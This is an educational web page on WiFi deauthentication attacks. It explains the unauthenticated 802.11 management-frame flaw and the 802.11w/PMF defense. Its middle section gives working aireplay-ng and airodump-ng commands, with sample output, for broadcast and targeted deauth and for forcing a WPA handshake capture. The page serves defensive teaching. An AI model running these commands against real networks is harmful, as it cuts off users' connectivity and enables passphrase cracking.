WiFi Attack
Deauth Attacks: WiFi Disconnection
Technical documentation on Deauthentication Attacks. Understand the attack technique and learn how to defend against it.
Medium Threat
Intermediate
Deauthentication is a management frame in 802.11 — it's how an AP tells a client "please disconnect." It's also how a client tells an AP "I'm done here." The frame contains the BSSID (AP's MAC address), the client MAC address, and a reason code.
The original 802.11 specification did not require management frames to be encrypted or authenticated — they were considered "low risk." This means anyone can send a deauth frame to any client on the same channel, and the client must obey it. The client has no way to verify the frame actually came from its AP.
802.11 Deauth Frame Structure:
RadioTap Header:
Timestamp: 1234567890
Channel: 6 (2437 MHz)
Signal: -42 dBm
802.11 Deauthentication Frame:
Type: Management (0x00)
Subtype: Deauthentication (0x0C)
BSSID: DE:AD:BE:EF:00:01 [Spoofable by attacker]
Source: DE:AD:BE:EF:00:01 [Spoofable by attacker]
Destination: AA:BB:CC:DD:EE:FF [Victim MAC]
Reason Code: 7 = Class 3 frame received from nonassociated STA
[This entire frame is unauthenticated and unencrypted]
[The victim cannot tell if this came from the real AP or an attacker]
Why It Works: The Protocol Flaw
The 802.11 standard requires clients to honor deauth frames from any MAC address claiming to be their AP. There is no cryptographic verification that the frame actually originated from the legitimate AP. This was an oversight in the original 1997 specification that persists in most networks today because:
- Fixing it requires hardware and firmware updates on both APs and clients
- 802.11w (the amendment that added management frame protection) requires both ends to support it
- Many legacy devices don't support 802.11w and can't be updated
aireplay-ng Deauth Commands
$ # Broadcast deauth to ALL clients on the target AP $ sudo aireplay-ng --deauth 0 -a DE:AD:BE:EF:00:01 wlan1mon 23:45:01 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01] 23:45:01 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01] 23:45:02 Sending DeAuth to broadcast -- BSSID: [DE:AD:BE:EF:00:01] [Continuous deauth — all clients on channel 6 disconnected] $ # Targeted deauth to a specific client MAC $ sudo aireplay-ng --deauth 5 -a DE:AD:BE:EF:00:01 -c AA:BB:CC:DD:EE:FF wlan1mon 23:45:10 Sending DeAuth to [AA:BB:CC:DD:EE:FF] -- BSSID: [DE:AD:BE:EF:00:01] 23:45:10 Sending DeAuth to [AA:BB:CC:DD:EE:FF] -- BSSID: [DE:AD:BE:EF:00:01] [5 deauth packets sent, then stops] [Only this one device was disconnected] $ # WPA handshake capture using deauth to force reconnection $ # Run airodump first to capture the handshake $ sudo airodump-ng wlan1mon --bssid DE:AD:BE:EF:00:01 -c 6 -w handshake_capture $ # In another terminal, send deauth to force a fresh handshake $ sudo aireplay-ng --deauth 5 -a DE:AD:BE:EF:00:01 wlan1mon [Victim reconnects, handshake captured in airodump window]
Defense: 802.11w Protected Management Frames
802.11w-2009 (also called PMF — Protected Management Frames) adds authentication to management frames, including deauthentication and dissociation frames. When both the AP and the client support 802.11w, forged deauth frames are rejected.
- Enable 802.11w on your APs: Most enterprise APs support it, but it's often disabled by default
- Update legacy devices: Some older devices can't support 802.11w and may need to be replaced
- WPA3 requires 802.11w: Networks using WPA3-SAE have mandatory management frame protection
Why Most Networks Still Don't Have 802.11w
802.11w has been a standard for 17 years, but many networks — especially older enterprise deployments, ISP-provided routers, and IoT devices — don't have it enabled. Some devices that support 802.11w have bugs that cause them to disconnect excessively, leading IT departments to disable it. This is one of the most common gaps between "the attack is well-known" and "the fix hasn't been deployed."
Understand the Threat. Build the Defense.
Learn how to protect yourself and your organization against Deauth Attacks attacks.